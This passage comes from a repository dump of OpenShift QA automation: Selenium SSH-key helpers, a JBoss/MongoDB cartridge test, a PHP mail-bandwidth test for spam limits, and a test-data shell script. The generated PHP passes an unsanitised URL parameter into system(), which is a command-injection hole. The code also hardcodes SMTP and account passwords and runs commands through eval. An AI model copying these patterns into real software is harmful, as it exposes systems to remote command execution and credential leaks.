AAAAB3NzaC1yc2EAAAADAQABAAABAQDMhaH9Gcu7+dvHMd1ALSbFwfHWmElg365nCAbcxokYi998qKYqIyCyExCanTYja+ZiusqXOt5g6Hq6jIam0chZ1tqw8QwJfeeW80uSJZ/16UpSQoZ8JwNpc+/b2M5OOaD/ibnaf2p3RYTQ4ujPx+bOuIEoyWjBLtIUtstbWK6rhrOVweFeR/qMmGgBml0AsUZ++OBp6dEXDgA4xHnemf14g8Rg0tm2fEZD5wo7xw4JdYCl1DezkSCJSW2vy4ALLeCQ7mBW+x2f3KnNa4EtFy/2mL4QB5twhsyKM6OTV8bYXS+cbpfG6Tt4UR5jRC+s7UYCPfpC6ceap4Ggx5fEf/EX\"\n driver.find_element_by_id(\"key_raw_content\").clear()\n driver.find_element_by_id(\"key_raw_content\").send_keys(sshkey)\n driver.find_element_by_id(\"key_submit\").click()\n wait_element_present_by_xpath(classself, \"id('default_sshkey')/td[1]\")\n\ndef has_domain(classself):\n go_to_account_page(classself)\n if is_element_present(classself, By.LINK_TEXT, \"Change your namespace...\"):\n return True\n else:\n return False\n\ndef add_sshkey(classself, name, key):\n go_to_account_page(classself)\n driver = classself.driver\n if (is_element_present(classself, By.LINK_TEXT,\"Add a new key...\")):\n driver.find_element_by_link_text(\"Add a new key...\").click()\n wait_element_present_by_id(classself, \"key_name\")\n driver.find_element_by_id(\"key_name\").clear()\n driver.find_element_by_id(\"key_name\").send_keys(name)\n driver.find_element_by_id(\"key_raw_content\").clear()\n driver.find_element_by_id(\"key_raw_content\").send_keys(key)\n driver.find_element_by_id(\"key_submit\").click()\n #if there is no key \n elif (is_element_present(classself, By.ID, \"key_submit\")):\n driver.find_element_by_id(\"key_raw_content\").clear()\n driver.find_element_by_id(\"key_raw_content\").send_keys(sshkey)\n driver.find_element_by_id(\"key_submit\").click()\n wait_element_present_by_xpath(classself, \"id('default_sshkey')/td[1]\")\n\n wait_element_present_by_xpath(classself, \"id('%s_sshkey')/td[1]\"%name)\n assert_element_present_by_xpath(classself, \"id('%s_sshkey')/td[1]\"%name) \n\ndef has_sshkey(classself):\n go_to_account_page(classself)\n if is_element_present(classself, By.ID, \"key_raw_content\"):\n return False\n else:\n return True\n\ndef gen_sshkey(keyfile=None, delete=True):\n key_filename = \"/tmp/testkey\"\n if (keyfile!=None):\n key_filename = keyfile \n os.system(\"rm -f \"+key_filename+\"*; ssh-keygen -N '' -f \"+key_filename+\" 1>/dev/null\")\n\n fpub = open(key_filename+\".pub\", \"r\")\n public = fpub.read()\n fpub.close()\n\n fpriv = open(key_filename, \"r\")\n private = fpriv.read()\n fpriv.close()\n if delete:\n os.system(\"rm -f %s*\"%key_filename)\n return (private, public)\n\ndef delete_sshkey(classself, keyname):\n driver = classself.driver\n go_to_account_page(classself)\n driver.find_element_by_xpath(\"id('%s_sshkey')/td[3]\"%keyname).click()\n wait_element_present_by_xpath(classself, \"id('%s_sshkey')/td[3]\"%keyname)\n assert_element_present_by_xpath(classself, \"id('%s_sshkey')/td[3]\"%keyname)\n" }, { "alpha_fraction": 0.5812231302261353, "alphanum_fraction": 0.5883898735046387, "avg_line_length": 35.71052551269531, "blob_id": "4f55132ad983a0b4014329037fb00564b09dc568", "content_id": "84147456d506be9fdc264751c779d6fb3d1dbd73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4186, "license_type": "no_license", "max_line_length": 166, "num_lines": 114, "path": "/automation/open/testmodules/RT/cartridge/jboss_mongodb_driver.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n#\n# File name: jboss_mongodb_driver.py\n# Date: 2012/02/28 06:00\n# Author: [email protected]\n#\n\nimport sys\nimport subprocess\nimport os\nimport string\nimport re\n\nimport testcase, common, OSConf\nimport rhtest\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary =\"[US1613][Runtime]Add Mongo DB driver module\"\n self.app_name = 'jboss1'\n self.app_type = 'jbossas'\n tcms_testcase_id = 135841\n self.steps = []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\n\nclass JbossMongodbDriver(OpenShiftTest):\n\n def test_method(self):\n self.steps.append(testcase.TestCaseStep(\"Create a JBoss app\",\n common.create_app,\n function_parameters=[self.app_name, common.app_types[self.app_type], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True],\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\"Embed mongoDB\",\n common.embed,\n function_parameters = [self.app_name, 'add-%s'%common.cartridge_types['mongodb'],self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_return=0,\n expect_description=0))\n\n def git_pull_n_update(app_name):\n mongo = OSConf.get_apps()[app_name]['embed'][common.cartridge_types['mongodb']]\n cmd='''\n cd %s &&\n git remote add upstream -m master git://github.com/openshift/jbossas-mongoDB-quickstart.git &&\n git pull -s recursive -X theirs upstream master &&\n git rm -r .openshift/config/modules &&\n export WEBXML='src/main/webapp/WEB-INF/web.xml' &&\n sed -i '/<param-name>host/,/init-param/ s/<param-value>.*/<param-value>%s<\\/param-value>/' $WEBXML &&\n sed -i '/<param-name>port/,/init-param/ s/<param-value>.*/<param-value>%s<\\/param-value>/' $WEBXML &&\n sed -i '/<param-name>db/,/init-param/ s/<param-value>.*/<param-value>%s<\\/param-value>/' $WEBXML &&\n sed -i '/<param-name>user/,/init-param/ s/<param-value>.*/<param-value>%s<\\/param-value>/' src/main/webapp/WEB-INF/web.xml &&\n sed -i '/<param-name>password/,/init-param/ s/<param-value>.*/<param-value>%s<\\/param-value>/' src/main/webapp/WEB-INF/web.xml &&\n git commit -a -m \"Removed modules and updated web.xml for mongoDB\" &&\n git push\n '''%(self.app_name, mongo['url'], mongo['port'], mongo['database'], mongo['username'], mongo['password'])\n\n (status, output) = common.command_getstatusoutput(cmd)\n\n return status\n\n self.steps.append(testcase.TestCaseStep(\"Pull the remote source...\",\n git_pull_n_update,\n function_parameters = [self.app_name],\n expect_return=0))\n\n def verify(app_name):\n app_url = OSConf.get_app_url(app_name)\n r = common.grep_web_page('%s/mongoDB'%app_url, 'Tutorial Objects Added to DB')\n r += common.grep_web_page('%s/mongoDB'%app_url, 'testCollection')\n return r\n\n self.steps.append(testcase.TestCaseStep(\"Check the web application\",\n verify,\n function_parameters = [self.app_name],\n expect_return=0))\n\n\n\n case = testcase.TestCase(self.summary, self.steps)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JbossMongodbDriver)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of jboss_mongodb_driver.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5437276363372803, "alphanum_fraction": 0.5536956787109375, "avg_line_length": 28.69832420349121, "blob_id": "563146cb78c996d178ba1952fcbb43b027d98e5c", "content_id": "ff3edf807c88e2d1c47d9e47b8ba58fc14a7cf7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5317, "license_type": "no_license", "max_line_length": 97, "num_lines": 179, "path": "/automation/open/testmodules/RT/node/bandwith_for_spammers.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: bandwith_for_spammers.py\n# Date: 2012/02/27 03:59\n# Author: [email protected]\n#\n\nimport common\nimport Common.File\nimport OSConf\nimport rhtest\nimport time\nimport json\n\nclass OpenShiftTest(rhtest.Test):\n ACCOUNT = {\n 'SMTP' : 'smtp.googlemail.com',\n 'USERNAME' : '[email protected]',\n 'PASSWORD' : 'vostok08'}\n ports = { #limits per port\n '25': {'limit_kbps': 24, \n 'fsize_kb':32 \n },\n '587':{'limit_kbps': 256,\n 'fsize_kb':128\n }}\n def initialize(self):\n self.ACCOUNT['RECIPIENT'] = self.config.OPENSHIFT_user_email\n self.summary = \"[Runtime][rhc-cartridge][US1478] Bandwith restriction for spamming users\"\n self.app_name = 'spam'+common.getRandomString(7)\n self.app_type = 'php'\n common.env_setup()\n\n def finalize(self):\n pass\n\nclass BandwidthForSpammers(OpenShiftTest):\n def test_method(self):\n self.add_step(\"Create a PHP app\" , \n common.create_app,\n function_parameters=[ self.app_name, \n common.app_types[self.app_type], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, True],\n expect_return=0)\n\n self.add_step(\"Enable email functionality.\",\n self.write_file, \n expect_return=0)\n\n self.add_step(\"Verify the limits via remote script.\",\n self.verify,\n expect_return=True)\n\n self.run_steps()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n def verify(self):\n base_url = OSConf.get_app_url(self.app_name)\n opts=\"-s -H Pragma:no-cache\"\n time.sleep(5)\n for port in self.ports.keys():\n time.sleep(10)\n url = base_url +'/spammer.php?port=%s&size=%s'%(port, self.ports[port]['fsize_kb'])\n fetch_cmd = \"curl %s '%s'\"%(opts, url)\n (retcode, output) = common.command_getstatusoutput(fetch_cmd)\n try:\n res = json.loads(output)\n except Exception as e:\n self.error(\"%s -- %s\"%(e, output))\n return False\n self.debug(res)\n if res['transmission_rate_kbps'] > self.ports[port]['limit_kbps']:\n self.error(\"Transmission rate for port#%s was over the allowed limit.\"%port)\n return False\n return True\n\n def write_file(self):\n php_program='''\n<?php\n\n// PEAR\nrequire_once('Mail.php');\nrequire_once('Mail/mime.php');\n\n// Sending Mail\nfunction mail_sending($hostname, $port, $username, $password, $attachment ) {\n $extraheaders['From'] = '%(USERNAME)s';\n $extraheaders['To'] = '%(RECIPIENT)s';\n $extraheaders['Subject'] = 'Test message';\n\n $params['host'] = $hostname;\n $params['port'] = $port;\n $params['auth'] = true;\n $params['username'] = $username;\n $params['password'] = $password;\n //Enable this if you want to debug ERRORS!\n //Then don't expect to have valid JSON response.\n //$params['debug'] = true;\n\n $smtp = Mail::factory('smtp', $params);\n\n $message = new Mail_mime();\n $message->setTXTBody('Just testing...');\n $message->addAttachment($attachment);\n $body = $message->get();\n $headers = $message->headers($extraheaders);\n\n $start_time = time(); \n $status = $smtp->send($extraheaders['To'], $headers, $body); \n $end_time = time();\n\n if (PEAR::isError($status)) {\n $error = $smtp->getMessage();\n }else{\n $error = \"Message successfully sent!\";\n }\n\n $diff = $end_time - $start_time;\n $size = strlen($body);\n $speed = ( ( (float) $size * 8 ) / $diff ) / 1024;\n return array(\n \"port\" => $port,\n \"error\" => $error,\n \"body_length\" => $size,\n \"filename\" => $attachment,\n \"elapsed_in_seconds\" => $diff,\n \"transmission_rate_kbps\" => $speed\n );\n}\n\n// Configuration\n$USERNAME = '%(USERNAME)s';\n$PASSWORD = '%(PASSWORD)s';\n\n// Creating testing attachments\nif (isset($_GET['size'])){\n $size=$_GET['size'];\n}else{\n $size=32;\n}\n$test_file = \"/tmp/test.img\";\nsystem(\"dd if=/dev/urandom of=$test_file bs=1024 count=$size\");\n\nif (isset($_GET['port'])){\n $port = $_GET['port'];\n}else{\n $port = 25;\n}\n$smtp_server='%(SMTP)s';\n$res = mail_sending($smtp_server, $port, $USERNAME, $PASSWORD, $test_file);\nprint json_encode($res);\n\n?>'''%(self.ACCOUNT)\n Common.File.append('%s/deplist.txt'%self.app_name, \"Mail\")\n Common.File.append('%s/deplist.txt'%self.app_name, \"Mail_Mime\")\n Common.File.write('%s/php/spammer.php'%self.app_name, php_program)\n cmd = [ 'cd %s '%self.app_name,\n 'git add php/spammer.php',\n 'git commit -a -m \"Added email feature\"',\n 'git push']\n return common.command_getstatusoutput(\" && \".join(cmd))[0]\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(BandwidthForSpammers)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of bandwith_for_spammers.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5596213340759277, "alphanum_fraction": 0.5707870721817017, "avg_line_length": 46.6242790222168, "blob_id": "0457743bbabed4e923fa39b5edc20937f8fe4ed0", "content_id": "0c80d4c3f1ce4e4793a6746e0d1bae82ada0dd2b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 16479, "license_type": "no_license", "max_line_length": 550, "num_lines": 346, "path": "/automation/open/prepare_testing_data/create_test_data.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nrun_command() {\n local command=\"$1\"\n echo \"Command: ${command}\" 2>&1 | tee -a ${log_file}\n #Method 1\n #output=$(eval \"${command}\" 2>&1)\n #ret=$?\n #echo -e \"$output\\n\" | tee -a ${log_file}\n\n #Method 2\n #(eval \"${command}\"; echo \"ret=$?\" >/tmp/ret) 2>&1 | tee -a ${log_file}\n #source /tmp/ret\n #rm -rf /tmp/ret\n #echo \"\"\n\n #Method 3\n eval \"${command}\" 2>&1 | tee -a ${log_file}\n ret=${PIPESTATUS[0]}\n return $ret\n}\n\nfunction create_app() {\n local app_name=\"$1\"\n local cart_name=\"$2\"\n local rhlogin=\"$3\"\n local passwd=\"$4\"\n shift 4\n local options=\"${@}\"\n\n echo \"Creating ${cart_name} app - ${app_name} ...\"\n command=\"rm -rf ${app_name} && rhc app create ${app_name} ${cart_name} -l ${rhlogin} -p ${passwd} ${options}\"\n run_command \"${command}\"\n return $?\n}\n\nfunction add_cart() {\n local app_name=\"$1\"\n local cart_name=\"$2\"\n local rhlogin=\"$3\"\n local passwd=\"$4\"\n shift 4\n local options=\"${@}\"\n\n echo \"Embedding ${cart_name} to ${app_name} app ...\"\n command=\"rhc cartridge add ${cart_name} -a ${app_name} -l ${rhlogin} -p ${passwd} ${options}\"\n run_command \"${command}\"\n return $?\n}\n\nfunction remove_cart() {\n local app_name=\"$1\"\n local cart_name=\"$2\"\n local rhlogin=\"$3\"\n local passwd=\"$4\"\n shift 4\n local options=\"${@}\"\n\n echo \"Removing ${cart_name} from ${app_name} app ...\"\n command=\"rhc cartridge remove ${cart_name} ${app_name} -l ${rhlogin} -p ${passwd} ${options}\"\n run_command \"${command}\"\n return $?\n}\n\nfunction destroy_app() {\n local app_name=\"$1\"\n local rhlogin=\"$2\"\n local passwd=\"$3\"\n local options=\"$4\"\n shift 4\n local options=\"${@}\"\n\n echo \"Destroying ${app_name} app ...\"\n command=\"rhc app delete ${app_name} --confirm -l ${rhlogin} -p ${passwd}\"\n run_command \"${command}\"\n return $?\n}\n\nget_date() {\n local date=$(date +\"%Y-%m-%d-%H-%M-%S\")\n echo \"$date\"\n}\n\nget_db_host() {\n local output=\"$1\"\n echo \"${output}\" | grep '^ *Connection URL:' | grep -v 'MySQL gear-local' | awk -F'/' '{print $3}' | awk -F: '{print $1}'\n return $?\n}\n\nget_db_port() {\n local output=\"$1\"\n echo \"${output}\" | grep '^ *Connection URL:' | grep -v 'MySQL gear-local' | awk -F'/' '{print $3}' | awk -F: '{print $2}'\n return $?\n}\n\nget_db_passwd() {\n local output=\"$1\"\n echo \"${output}\" | grep 'Root Password:' | awk '{print $NF}'\n return $?\n}\n\n########################################\n### Main ###\n########################################\n\nrhlogin=\"xx\"\nnamespace=\"xx\"\npassword=\"redhat\"\n\n#jbossas_app=\"jbossastest\"\npython_app=\"reviewboard\"\nphp_app=\"drupal\"\nperl_app=\"perlapp\"\nruby18_app=\"redmine\"\ndiy_app=\"diytest\"\njbosseap_app=\"jbeapapp\"\nruby19_app=\"railsapp\"\njbossews_app=\"jbewsapp\"\n#nodejs_app=\"etherpad\"\n\nscalable_python_app=\"pythonscal\"\nscalable_php_app=\"mediawiki\"\nscalable_perl_app=\"perlscal\"\nscalable_ruby18_app=\"ruby18scal\"\nscalable_jbosseap_app=\"jbeapscal\"\nscalable_ruby19_app=\"ruby19scal\"\nscalable_jbossews_app=\"jbewsscal\"\n\n\n#scalable_nodejs_app=\"nodejsscal\"\n\n# initial log\ndate=$(get_date)\nlog_file=\"log/my.${date}.log\"\nuser_info_file=\"user_info.${date}\"\n\nif [ ! -d log ]; then\n mkdir log\nfi\n\ntouch ${log_file}\n\n#set -x\n\n# create domains and keys\n#echo -e \"Create domains and keys ...\\n\"\n#command=\"rhc-create-domain -n ${namespace1} -l ${rhlogin} -p ${password}\"\n#run_command \"${command}\"\n#ret1=$?\n#command=\"rhc-create-domain -n ${namespace2} -l ${rhlogin} -p ${password}\"\n#run_command \"${command}\"\n#ret2=$?\n#if [ X\"$ret1\" != X\"0\" ] || [ X\"$ret2\" != X\"0\" ]; then \n# echo \"Please destroy already existing domains or using non-exisiting domains\"\n# exit 1\n#fi\n\n#key_name=\"mykey\"\n#dsa_key_file=\"~/.ssh/mykey\"\n#if [ ! -f ${dsa_key_file} ]; then\n# echo -e \"Generating ssh-dsa key\\n\"\n# command=\"ssh-keygen -N '' -y -t dsa -f ${dsa_key_file}\"\n# run_command \"${command}\"\n#fi\n#command=\"rhc-ctl-domain -n ${namespace1} -l ${rhlogin} -a ${key_name} -k ${dsa_key_file}.pub -p ${password}\"\n#run_command \"${command}\"\n\necho -e \"Please input your choice\\n 0: all data \\n Specified app: jbossas_app|python_app|perl_app|ruby18_app|diy_app|php_app|nodejs_app|ruby19_app|jbossews_app|jbosseap_app|scalable_jbosseap_app|scalable_perl_app|scalable_ruby18_app|scalable_php_app|scalable_python_app|scalable_ruby19_app|scalable_nodejs_app|scalable_jbossews_app\"\nread choice\n# create app and embedding cartridge\n\necho -e \"Creating test data ... \\n\"\necho '---------------------------------' | tee -a ${log_file}\ncreate_app jenkins \"jenkins\" ${rhlogin} ${password}\n\n#echo '---------------------------------' | tee -a ${log_file}\n#if [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"jbossas_app\" ]; then\n# create_app ${jbossas_app} \"jbossas-7\" ${rhlogin} ${password} '--enable-jenkins' \"-g medium\" &&\n# add_cart ${jbossas_app} \"postgresql-8.4\" ${rhlogin} ${password} &&\n# run_command \"cp -rf data/test.jsp ${jbossas_app}/src/main/webapp/ && cd ${jbossas_app} && git add . && git commit -a -mx && git push && cd -\"\n#fi\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"python_app\" ]; then\n create_app ${python_app} \"python\" ${rhlogin} ${password} &&\n add_cart ${python_app} \"jenkins-client\" \"${rhlogin}\" \"${password}\" &&\n add_cart ${python_app} \"mysql\" \"${rhlogin}\" \"${password}\" &&\n# add_cart ${python_app} \"phpmyadmin-3.4\" ${rhlogin} ${password} &&\n run_command \"cd ${python_app} && git remote add upstream -m master git://github.com/openshift/reviewboard-example.git && git pull -s recursive -X theirs upstream master && git push && cd -\"\nfi\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"perl_app\" ]; then \n create_app ${perl_app} \"perl-5.10\" ${rhlogin} ${password} &&\n output=$(add_cart ${perl_app} \"mysql\" \"${rhlogin}\" \"${password}\") &&\n echo \"${output}\" &&\n db_passwd=$(get_db_passwd \"${output}\") &&\n db_host=$(get_db_host \"${output}\") &&\n db_port=$(get_db_port \"${output}\") &&\n run_command \"cp -rf data/test.pl ${perl_app}/perl/ && cd ${perl_app} && sed -i -e 's/changeme_db/${perl_app}/g' -e 's/changeme_url/${db_host}/g' -e 's/changeme_port/${db_port}/g' -e 's/changeme_username/admin/g' -e 's/changeme_password/${db_passwd}/g' perl/test.pl && git add . && git commit -a -mx && git push && cd -\"\n run_command \"rhc app stop ${perl_app} -l ${rhlogin} -p ${password}\"\nfi\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"ruby18_app\" ]; then \n create_app ${ruby18_app} \"ruby-1.8\" ${rhlogin} ${password} &&\n output=$(add_cart ${ruby18_app} \"mysql-5.1\" \"${rhlogin}\" \"${password}\") &&\n echo \"${output}\" &&\n db_passwd=$(get_db_passwd \"${output}\") &&\n db_host=$(get_db_host \"${output}\") &&\n run_command \"rhc alias add ${ruby18_app} -l ${rhlogin} -p ${password} bar.${namespace}.com\" &&\n #add_cart ${ruby18_app} \"metrics-0.1\" \"${rhlogin}\" \"${password}\" &&\n run_command \"cd ${ruby18_app} && rm -rf * && git remote add upstream -m master git://github.com/openshift/redmine-openshift-quickstart.git && git pull -s recursive -X theirs upstream master && sed -i -e 's/password:.*/password: ${db_passwd}/' -e 's/host:.*/host: ${db_host}/' config/database.yml && git commit -a -m 'DB Changes' && git push && cd -\"\nfi\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"diy_app\" ]; then\n create_app ${diy_app} \"diy-0.1\" ${rhlogin} ${password} &&\n run_command \"cd data && tar -xvzf django-1.3.1.tar.gz && cd - && mv data/Django-1.3.1/django ${diy_app}/diy/ && cd ${diy_app}/diy/ && unzip ../../data/myrawapp.zip && cd -\" &&\n run_command \"cp data/diyapp_start ${diy_app}/.openshift/action_hooks/start && cp data/diyapp_stop ${diy_app}/.openshift/action_hooks/stop\" &&\n run_command \"cd ${diy_app} && git add . && git commit -a -mx && git push && cd -\"\nfi\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"php_app\" ]; then\n create_app ${php_app} \"php\" ${rhlogin} ${password} &&\n add_cart ${php_app} \"mysql\" \"${rhlogin}\" \"${password}\" &&\n add_cart ${php_app} \"cron\" \"${rhlogin}\" \"${password}\" &&\n# add_cart ${php_app} \"phpmyadmin-3.4\" \"${rhlogin}\" \"${password}\" &&\n run_command \"cd ${php_app} && git remote add upstream -m master git://github.com/openshift/drupal-example.git && git pull -s recursive -X theirs upstream master && git push && cd -\"\nfi\n\n\n#echo '---------------------------------' | tee -a ${log_file}\n#if [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"nodejs_app\" ]; then\n# create_app ${nodejs_app} \"nodejs-0.6\" ${rhlogin} ${password} &&\n# add_cart ${nodejs_app} \"mongodb-2.2\" \"${rhlogin}\" \"${password}\" &&\n# add_cart ${nodejs_app} \"rockmongo-1.1\" \"${rhlogin}\" \"${password}\" &&\n# run_command \"mkdir ${nodejs_app}/.openshift/mms && cp ~/Downloads/mms-agent/settings.py ${nodejs_app}/.openshift/mms/settings.py && cd ${nodejs_app} && git add . && git commit -a -mx && git push && cd -\" &&\n# add_cart ${nodejs_app} \"10gen-mms-agent-0.1\" \"${rhlogin}\" \"${password}\" &&\n# run_command \"cd ${nodejs_app} && git remote add upstream -m master git://github.com/openshift/etherpad-example.git && git pull -s recursive -X theirs upstream master && git push && cd -\"\n#fi\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"ruby19_app\" ]; then\n create_app ${ruby19_app} \"ruby-1.9\" ${rhlogin} ${password} &&\n add_cart ${ruby19_app} \"mysql\" \"${rhlogin}\" \"${password}\" &&\n run_command \"cd ${ruby19_app} && git remote add upstream -m master git://github.com/openshift/rails-example.git && git pull -s recursive -X theirs upstream master && git push && cd -\"\nfi\n\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"jbossews_app\" ]; then\n create_app ${jbossews_app} \"jbossews\" ${rhlogin} ${password} \"-g medium\" &&\n output=$(add_cart ${jbossews_app} \"mysql\" \"${rhlogin}\" \"${password}\") &&\n echo \"${output}\" &&\n db_passwd=$(get_db_passwd \"${output}\") &&\n db_host=$(get_db_host \"${output}\") &&\n db_port=$(get_db_port \"${output}\") &&\n run_command \"cp -rf data/mysql.jsp ${jbossews_app}/src/main/webapp/ && mkdir -p ${jbossews_app}/src/main/webapp/WEB-INF/lib && cp -rf data/mysql-connector-java-5.1.20-bin.jar ${jbossews_app}/src/main/webapp/WEB-INF/lib && cd ${jbossews_app}/src/main/webapp/ && sed -i -e 's/#host/${db_host}/g' mysql.jsp && sed -i -e 's/#port/${db_port}/g' mysql.jsp && sed -i -e 's/#dbname/${jbossews_app}/g' mysql.jsp && sed -i -e 's/#user/admin/g' mysql.jsp && sed -i -e 's/#passwd/${db_passwd}/g' mysql.jsp && git add . && git commit -amt && git push && cd -\"\nfi\n\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"jbosseap_app\" ]; then\n create_app ${jbosseap_app} \"jbosseap\" ${rhlogin} ${password} \"-g medium\" &&\n add_cart ${jbosseap_app} \"postgresql-8.4\" \"${rhlogin}\" \"${password}\" &&\n run_command \"cp -rf data/test.jsp ${jbosseap_app}/src/main/webapp/test.jsp && cd ${jbosseap_app} && git add . && git commit -a -mx && git push && cd -\"\nfi\n\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"scalable_jbosseap_app\" ]; then\n create_app ${scalable_jbosseap_app} \"jbosseap-6.0\" ${rhlogin} ${password} '--scaling' \"-g medium\" &&\n add_cart ${scalable_jbosseap_app} \"jenkins-client\" ${rhlogin} ${password} &&\n add_cart ${scalable_jbosseap_app} \"mysql\" ${rhlogin} ${password} &&\n run_command \"cp -rf data/test1.jsp ${scalable_jbosseap_app}/src/main/webapp/test.jsp && cd ${scalable_jbosseap_app} && git add . && git commit -a -mx && git push && cd -\"\nfi\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"scalable_perl_app\" ]; then\n create_app ${scalable_perl_app} \"perl-5.10\" ${rhlogin} ${password} '--scaling' &&\n add_cart ${scalable_perl_app} \"jenkins-client\" \"${rhlogin}\" \"${password}\" &&\n output=$(add_cart ${scalable_perl_app} \"mysql\" \"${rhlogin}\" \"${password}\") &&\n echo \"${output}\" &&\n db_passwd=$(get_db_passwd \"${output}\") &&\n db_host=$(get_db_host \"${output}\") &&\n db_port=$(get_db_port \"${output}\") &&\n run_command \"cp -rf data/test.pl ${scalable_perl_app}/perl/ && cd ${scalable_perl_app} && sed -i -e 's/changeme_db/${scalable_perl_app}/g' -e 's/changeme_url/${db_host}/g' -e 's/changeme_port/${db_port}/g' -e 's/changeme_username/admin/g' -e 's/changeme_password/${db_passwd}/g' perl/test.pl && git add . && git commit -a -mx && git push && cd -\"\nfi\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"scalable_ruby18_app\" ]; then\n create_app ${scalable_ruby18_app} \"ruby-1.8\" ${rhlogin} ${password} '--scaling' &&\n output=$(add_cart ${scalable_ruby18_app} \"mysql\" \"${rhlogin}\" \"${password}\") &&\n echo \"${output}\" &&\n db_passwd=$(get_db_passwd \"${output}\") &&\n db_host=$(get_db_host \"${output}\") &&\n db_port=$(get_db_port \"${output}\") &&\n run_command \"cp -r data/{config.ru,Gemfile} ${scalable_ruby18_app}/ && cd ${scalable_ruby18_app} && bundle install && sed -i -e 's/#host/${db_host}/g' config.ru && sed -i -e 's/#port/${db_port}/g' config.ru && sed -i -e 's/#dbname/${scalable_ruby18_app}/g' config.ru && sed -i -e 's/#user/admin/g' config.ru && sed -i -e 's/#passwd/${db_passwd}/g' config.ru && git add . && git commit -amt && git push && cd -\"\nfi\n\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"scalable_php_app\" ]; then\n create_app ${scalable_php_app} \"php\" ${rhlogin} ${password} '--scaling' &&\n add_cart ${scalable_php_app} \"mysql\" \"${rhlogin}\" \"${password}\" &&\n run_command \"cd ${scalable_php_app} && git remote add upstream -m master git://github.com/openshift/mediawiki-example.git && git pull -s recursive -X theirs upstream master && git push && cd -\"\nfi\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"scalable_python_app\" ]; then\n create_app ${scalable_python_app} \"python\" ${rhlogin} ${password} '--scaling' &&\n add_cart ${scalable_python_app} \"jenkins-client\" \"${rhlogin}\" \"${password}\" &&\n output=$(add_cart ${scalable_python_app} \"mysql\" \"${rhlogin}\" \"${password}\") &&\n echo \"${output}\" &&\n db_passwd=$(get_db_passwd \"${output}\") &&\n db_host=$(get_db_host \"${output}\") &&\n db_port=$(get_db_port \"${output}\") &&\n run_command \"cp -r data/application ${scalable_python_app}/wsgi/ && cd ${scalable_python_app} && sed -i -e 's/#host/${db_host}/g' -e 's/#port/${db_port}/g' -e 's/#dbname/${scalable_python_app}/g' -e 's/#user/admin/g' -e 's/#passwd/${db_passwd}/g' wsgi/application && git add . && git commit -amt && git push && cd -\"\nfi\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"scalable_ruby19_app\" ]; then\n create_app ${scalable_ruby19_app} \"ruby-1.9\" ${rhlogin} ${password} '--scaling' &&\n add_cart ${scalable_ruby19_app} \"mysql\" \"${rhlogin}\" \"${password}\" &&\n run_command \"cd ${scalable_ruby19_app} && git remote add upstream -m master git://github.com/openshift/rails-example.git && git pull -s recursive -X theirs upstream master && git push && cd -\"\nfi\n\n#echo '---------------------------------' | tee -a ${log_file}\n#if [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"scalable_nodejs_app\" ]; then\n# create_app 